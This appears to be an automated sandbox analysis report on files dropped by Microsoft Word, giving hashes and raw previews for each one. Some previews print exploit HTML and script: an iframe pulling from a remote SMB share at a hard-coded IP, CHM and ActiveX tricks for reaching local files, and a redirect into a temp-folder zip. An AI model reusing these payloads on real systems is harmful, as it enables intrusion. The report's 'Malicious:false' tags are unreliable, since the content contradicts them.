                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1024
                                                                                                                                          Entropy (8bit):1.0858937549421035
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:dXXXXXXXPN6dn/lDl/PlXllZrGzy/Csnlpoh3llprVlpwz1i8lpxoUllpKJllpBK:CAzTElponlpJlpwk8lpBlp8lpFlpKtn
                                                                                                                                          MD5:C0E2E7412E3F392B7753B564C92F164C
                                                                                                                                          SHA1:E195E7A4329CC2A307E5FDF80C15CC255AD03CE6
                                                                                                                                          SHA-256:EE57097CADF9AB862FC60C18426CB6360EF154A03A576308701C04BFC853478D
                                                                                                                                          SHA-512:2F0496B226FCC939867A5234C6898F26E691EDE7B238AE632BB4CCD9CD0067F8FAA35689F44449A2B8FB4E61C2AB082F8C678724EC477C3A287296038DC72185
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(.(.(.(.(.(.(.(.(.(.(.p.r.a.t.e.s.h.p.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.....hBG.....j.....hBG.....j.....hBG.....j.....hBG.....j.....hBG.....j..L..hBG.....j.
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1636
                                                                                                                                          Entropy (8bit):2.550711213392701
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:qWwAwNKl6ATQu1it0TAwqv/Aj/QodQQq+R0Yq/lN103Ka3z:qWwAQKpTQuEHk4gR0Yq/dMz
                                                                                                                                          MD5:947E3356A835C93D21AD49186C723F97
                                                                                                                                          SHA1:1D31B02EDA72B614660C9A4DA9FF438C5AC58BE5
                                                                                                                                          SHA-256:37C7915F7FBC726F10A8547E03AC8070647EF2C0AA1A584A41F470211B7896A7
                                                                                                                                          SHA-512:70DC3B45B8FF83D721CCA73C68E7543D48C94654E8AEF6F42522C7C36B8F64CEDD1C966D480DDB9E050E9EB2E5492A2538B74BE9982488E33C556E210734820B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:X.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.o.f.f.i.c.e./.w.o.r.d./.2.0.0.3./.w.o.r.d.m.l.2.4.5.0.......).(.).(.).(.).(.).(.). .....W.o.r.d...D.o.c.u.m.e.n.t...8.=. . ......... .\.a. .\.t. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".\.\.\.\.1.0.4...2.3.4...2.3.9...2.6.\.\.s.h.a.r.e.1.\.\.M.S.H.T.M.L._.C.7.\.\.f.i.l.e.0.0.1...u.r.l.". .".".L.I.N.K.x.m.l.f.i.l.e.{.0.0.0.0.0.3.0.0.-.0.0.0.0.-.0.0.0.0.-.C.0.0.0.-.0.0.0.0.0.0.0.0.0.0.4.6.}.=. . ......... .\.a. .\.t. .h.t.m.l.f.i.l.e.......................................................................b.......................................................................................................................................................................................................................................................................................................................j....OJ..QJ..U..mH..sH...5..OJ..QJ..mH..sH...OJ..QJ..mH..sH.....h.1l.OJ..QJ..mH..sH.....h.1l.5..OJ..QJ..\..mH..sH... CJ..OJ..Q
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66
                                                                                                                                          Entropy (8bit):1.2628822391789147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:qVUNNU7Gb:qANkGb
                                                                                                                                          MD5:67DA67C9F53B8197E4CD48329718FC28
                                                                                                                                          SHA1:8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
                                                                                                                                          SHA-256:C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
                                                                                                                                          SHA-512:427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html>11111111111111111111111111111111111111111111111111111</html>
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):576
                                                                                                                                          Entropy (8bit):5.325609436459455
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:MMHdjR9JoTIB99bx4Wh9abdcs/NSmDXuM8nKhoZM1GMGw:JdjR9JoUnJx4WvID9DXuMkM7P
                                                                                                                                          MD5:0C72B2479316B12073D26C6ED74D3BDC
                                                                                                                                          SHA1:D46E2B72890C180C33648326BD37F59BA77291C4
                                                                                                                                          SHA-256:48142DC7FE28A5D8A849FFF11CB8206912E8382314A2F05E72ABAD0978B27E90
                                                                                                                                          SHA-512:E81982B81AD20CDC2402C6C80041BEA83773E6B5D30ABAA50F5E9EE11E5278F4A032BDBAEC34968BD03AAD0770D101B98A88408F9DFD8483F45FC0BDC2EBA90D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='#'?>....<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl" xmlns:xslt="http://www.w3.org/1999/XSL/Transform" result-ns="">..<xsl:template match="/">....<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="X-UA-Compatible" content="IE=7"/>..</head>....<body>......<iframe src='RFile.asp' width='800' height='800'></iframe>..<script defer=''>....lt=String.fromCharCode(60);..gt=String.fromCharCode(62);....</script>....</body>..</html>....</xsl:template>..</xsl:stylesheet>
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66
                                                                                                                                          Entropy (8bit):1.2628822391789147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:qVUNNU7Gb:qANkGb
                                                                                                                                          MD5:67DA67C9F53B8197E4CD48329718FC28
                                                                                                                                          SHA1:8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
                                                                                                                                          SHA-256:C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
                                                                                                                                          SHA-512:427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html>11111111111111111111111111111111111111111111111111111</html>
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):292
                                                                                                                                          Entropy (8bit):5.373055167434458
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:qzAosxNRQB8BGQjW8rLoW1Yp1BXCQBGQjW8rZhTYwigSeTvOI:kADtBGr8QW1UBXCQBGr8kyOI
                                                                                                                                          MD5:A9ECB696E3FAED1BAB7D2A427D6CFB5C
                                                                                                                                          SHA1:56304A51EC454C0F4D0BE931B1777C268821CE8E
                                                                                                                                          SHA-256:79748768C69F4B08F3E1A8471C934307155CA79FE442CFA358E4EB9E2BF213B2
                                                                                                                                          SHA-512:63816F9E956EC7074881AB7B27578EDB2D7645B1F051A1E7BECE095312F510007BB8323088D55CBE0AF268341C0E0BE2920032ACF3868C7C00C8EEE78828E4B7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html><body onload=setTimeout('fx()',30000)><iframe src=file://104.234.239.26/share1/MSHTML_C7></iframe><script>function fx() { document.body.innerHTML='<iframe src=file://104.234.239.26/share1/MSHTML_C7/1/84.17.52.5_4f657_file001.htm?d=84.17.52.5_4f657_></iframe>'; } </script></body></html>
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66
                                                                                                                                          Entropy (8bit):1.2628822391789147
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:qVUNNU7Gb:qANkGb
                                                                                                                                          MD5:67DA67C9F53B8197E4CD48329718FC28
                                                                                                                                          SHA1:8036D0AC286D0A8EFD6155BDA9F4A3C5D153CD77
                                                                                                                                          SHA-256:C1A23DC7A8466911BF4B7478098D9410CFFD114E6A17CF573900B3973FA69EBA
                                                                                                                                          SHA-512:427F3369978F7F2F7244EDD94CC66B0DD87C002F3A7345EC7088AD5D7726EB0EE088AC13381EC9CBDBCA99A01A77871D3A37FE5C31FA5EBE10E3AD8E9887E08B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html>11111111111111111111111111111111111111111111111111111</html>
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1272
                                                                                                                                          Entropy (8bit):5.520959394979567
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:k5kBmPTEuPkuIuGdENZIGdE4RRS5t9pmETDgnfAJ4j3HSrz:WkBWEucFuGdENeGdE4e5iy4j3yv
                                                                                                                                          MD5:E65A1828D6AFE3F27B4EC7EC1A2FEE20
                                                                                                                                          SHA1:18C1F21D8AABAAD6EDF1D5DA5ACAA9A4CA3C6D67
                                                                                                                                          SHA-256:F08CC922C5DAB73F6A2534F8CEEC8525604814AE7541688B7F65AC9924ACE855
                                                                                                                                          SHA-512:5FC4C3FCA5606FB6B12A2C73C788BE9B8ED26674E7AB7CED6D0C669A578055DE41942C38F75805D9DD860307C177C8C828FA0E2B2334CE4BEFDD6D12BF365E28
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html><body><div id=d1></div>..<script defer>....loc=location.href.toLowerCase();....qs=loc.indexOf('?');....lb = loc.lastIndexOf('/');......if (loc.indexOf('?wb') == -1) {......if (qs == -1)..{..loc2 = loc;..}....else {..loc2=loc.substring(0,qs);..}....loc2=loc2 + '?wb=1';......p=createPopup();..p.show(0,0,1,1);....p.document.write('<object id=wb classid=clsid:8856F961-340A-11D0-A96B-00C04FD705A2><param name=Location value=' + loc2 + '></object>');..}....else {......dl = loc.indexOf('c:');....shb = loc.indexOf('c$');......if (dl != -1) {....loc2 = loc.substring(dl,lb+1);....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......if (shb != -1) {....loc2 = loc.substring(shb,lb+1);....loc2 = loc2.replace('c$','c:');....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......document.getElementById('d1').innerHTML='<OBJECT id=h2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 width=40% height=40%><PARAM name="Command" value="related topics,MENU"><param name=button value=text:x><pa
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1272
                                                                                                                                          Entropy (8bit):5.520959394979567
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:k5kBmPTEuPkuIuGdENZIGdE4RRS5t9pmETDgnfAJ4j3HSrz:WkBWEucFuGdENeGdE4e5iy4j3yv
                                                                                                                                          MD5:E65A1828D6AFE3F27B4EC7EC1A2FEE20
                                                                                                                                          SHA1:18C1F21D8AABAAD6EDF1D5DA5ACAA9A4CA3C6D67
                                                                                                                                          SHA-256:F08CC922C5DAB73F6A2534F8CEEC8525604814AE7541688B7F65AC9924ACE855
                                                                                                                                          SHA-512:5FC4C3FCA5606FB6B12A2C73C788BE9B8ED26674E7AB7CED6D0C669A578055DE41942C38F75805D9DD860307C177C8C828FA0E2B2334CE4BEFDD6D12BF365E28
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<html><body><div id=d1></div>..<script defer>....loc=location.href.toLowerCase();....qs=loc.indexOf('?');....lb = loc.lastIndexOf('/');......if (loc.indexOf('?wb') == -1) {......if (qs == -1)..{..loc2 = loc;..}....else {..loc2=loc.substring(0,qs);..}....loc2=loc2 + '?wb=1';......p=createPopup();..p.show(0,0,1,1);....p.document.write('<object id=wb classid=clsid:8856F961-340A-11D0-A96B-00C04FD705A2><param name=Location value=' + loc2 + '></object>');..}....else {......dl = loc.indexOf('c:');....shb = loc.indexOf('c$');......if (dl != -1) {....loc2 = loc.substring(dl,lb+1);....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......if (shb != -1) {....loc2 = loc.substring(shb,lb+1);....loc2 = loc2.replace('c$','c:');....loc2 = 'ms-its:' + loc2 + '2222.chm::/file1.htm';..}......document.getElementById('d1').innerHTML='<OBJECT id=h2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 width=40% height=40%><PARAM name="Command" value="related topics,MENU"><param name=button value=text:x><pa
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):104
                                                                                                                                          Entropy (8bit):5.0421562142480365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:gAWY33AtwXJY55UPGjW88cLupAidtqTQJTRy:qY33Atj55eGjW88ndQTYRy
                                                                                                                                          MD5:578F684585A2CCED6D1CC00D19ADAA22
                                                                                                                                          SHA1:1959CA1BF0C476ACD67846C8A7FAB0D3A130FDD4
                                                                                                                                          SHA-256:CC74C7456A9AC2A01EA990A0BB786FDA6639B06A4C2A685AA687B70BDE3ECDBD
                                                                                                                                          SHA-512:2C56F81156EDD3B10B8A23674DA515DC0ED44A359CF01F970852770C3CDDE7A7469D43D2C7702A0182A953E0CDCC438D1E66824659B17DF742F4CCC3A03C82D8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[ZoneTransfer]..ZoneId=3..ReferrerUrl=\\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zip..
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):9804
                                                                                                                                          Entropy (8bit):2.1712613498501137
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:nELgCqt0jQRlEFlErlElj5sINU7izQOeAJR3K2fnLWOsZeaQ2:niKe2WreArLWOBaQ
                                                                                                                                          MD5:B15FBE43A5C198266D3D881C5366BB93
                                                                                                                                          SHA1:0716F9413712D09D030C2AC9A05A26E157F74E6D
                                                                                                                                          SHA-256:263A664BB497A1752A2FDDC54B90313115CA358022DC1AD9C0A3C183DC454B58
                                                                                                                                          SHA-512:3707FA283F804454350427374A7BC5904FBF61939209C07301B89C2F4822FE0EFFAE41044C34FB15278E34EA4AF765E20DD92E19E6A7B6B02CFB8212BC909F24
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:ITSF....`.........CH.......|.{.......".....|.{......."..`...............x.......T.......................L&..............ITSP....T...........................................j..].!......."..T...............PMGLy................/..../#IDXHDR..#.../#ITBITS..../#STRINGS...../#SYSTEM....../#TOPICS..#0./#URLSTR..w7./#URLTBL..S$./#WINDOWS..W.L./file1.htm...T./file1.mht..n.w./fileH.htm..e.T./fileH.mht..9.x./img.bmp..1.&./INDEX.htm....::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content....H,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable..P0.....................................................................................................................................................
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):849
                                                                                                                                          Entropy (8bit):5.123459746741447
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:MYc7ABNMOy4e2EvOJKF3sBGk5clvS5SrO9Dgoa8xI7l4peNxjJWdqkDstob:MPkBNrCk28i7SgNxVystob
                                                                                                                                          MD5:EBA757C552EFE9683E23F03516828323
                                                                                                                                          SHA1:0184BEBA3AF89BEFEBC09124ECC2C286EB674387
                                                                                                                                          SHA-256:4FC768476EE92230DB5DBC4D8CBCA49A71F8433542E62E093C3AD160F699C98D
                                                                                                                                          SHA-512:3C9071DF38413FDC7E451607C3D685424DFF90423710B6A993B9DC4FC733FADEB628C2E7D8B9073364DEE5E38EA0198F2FA28CBCE0FB355032B2D319B5DC2FBC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.<html>..<script>..loc=location.href.toLowerCase();........d_s = '?d=';..dx = loc.indexOf(d_s);....c_s = '&c=';..cx = loc.indexOf(c_s);....u_s = '&u=';..ux = loc.indexOf(u_s);......if (dx != -1) ....{..d=loc.substring(dx + d_s.length,cx); dir_s = true;..}....else { dir_s = false; }......if (cx != -1)..{..CompName= loc.substring(cx + c_s.length,ux); cn_s = true;..}....else { cn_s = false; }......if (ux != -1)..{..UName= loc.substring(ux + u_s.length,loc.length); usr_s = true;..}....else { usr_s = false; }......if (dir_s == true && cn_s == true && usr_s == true) {..document.write('<meta http-equiv=refresh content="0;URL=file://' + CompName + '/c$/users/' + UName + '/appdata/local/temp/temp1_' + d + 'file001.zip/1111.htm">');..}....else {..document.write('<html>d=' + dir_s + '<br>c=' + cn_s + '<br>u=' + usr_s + '</html>');..}....</script>
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):663
                                                                                                                                          Entropy (8bit):5.949125862393289
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                          MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                          SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                          SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                          SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):512
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):333602
                                                                                                                                          Entropy (8bit):4.65455658727993
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:ybW83ob181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:Z
                                                                                                                                          MD5:58AAFDDC9C9FC6A422C6B29E8C4FCCA3
                                                                                                                                          SHA1:1A83A0297FE83D91950B71114F06CE42F4978316
                                                                                                                                          SHA-256:9095FE60C9F5A135DFC22B23082574FBF2F223BD3551E75456F57787ABC5797B
                                                                                                                                          SHA-512:1EBB116BAE9FE02CA942366C8E55D479743ABB549965F4F4302E27A21B28CDF8B75C8730508F045BA4954A5AA0B7EB593EE88226DE3C94BF4E821DBE4513118A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):297017
                                                                                                                                          Entropy (8bit):5.000343845106573
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:GwprAtk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:I
                                                                                                                                          MD5:0D0E65173F5AE6FE524DA09EEDDDCC84
                                                                                                                                          SHA1:C868617C86C1287B35875AE8D943457756B0B338
                                                                                                                                          SHA-256:787D1CBF076902B2568E8CFF1245E5FBEBA6AAD84240A54C4F9957084B93F90D
                                                                                                                                          SHA-512:E2FD5156BA707F6205B5CC52CC4FF8E1CDECB10B6C04E70EC4B3D3D0FA636AB9FDAE77F249D9D303D35CCCA8F8B399B60C602629B8803F708CFDAE8A1122603D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$p
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):268670
                                                                                                                                          Entropy (8bit):5.054376958189988
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:JwprAJiR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N4
                                                                                                                                          MD5:B17C7119B252FD46A675143F80499AA4
                                                                                                                                          SHA1:4445782BEC229727EE6F384EC29E0CBA82C25D22
                                                                                                                                          SHA-256:8535282A6E53FA4F307375BCEE99DD073A4E2E04FAF8841E51E1AA0EE351A670
                                                                                                                                          SHA-512:F9FB76A662DC6AB8DE22B87E817B4BAAC1AEEE08BA4F5090E6BC3060F42BC7CD15A71EB5B117554AEB395B22E5C2EEA7D0EFC36FF13BEC13B156879B87641505
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):256358
                                                                                                                                          Entropy (8bit):5.104453150382283
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:gwprAB795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:BW
                                                                                                                                          MD5:4C7ECD0ED5ADCC30352E2C06931D290A
                                                                                                                                          SHA1:0E6A8E0EDDB5E67E26CF15692D1E8591F3D3D1DE
                                                                                                                                          SHA-256:40BACD32DB58799FA95B4707588ADEA1C9065CD804712B69B55DDD332C037D4E
                                                                                                                                          SHA-512:2C25363DCCDB718D427CE451963F1616344A59A57AF0A19F946B7C06536E773E0EA383AC48AAC35E109327B7B86432D608CB0490EBF9590A31AA87330D6F929B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):251449
                                                                                                                                          Entropy (8bit):5.103599476769172
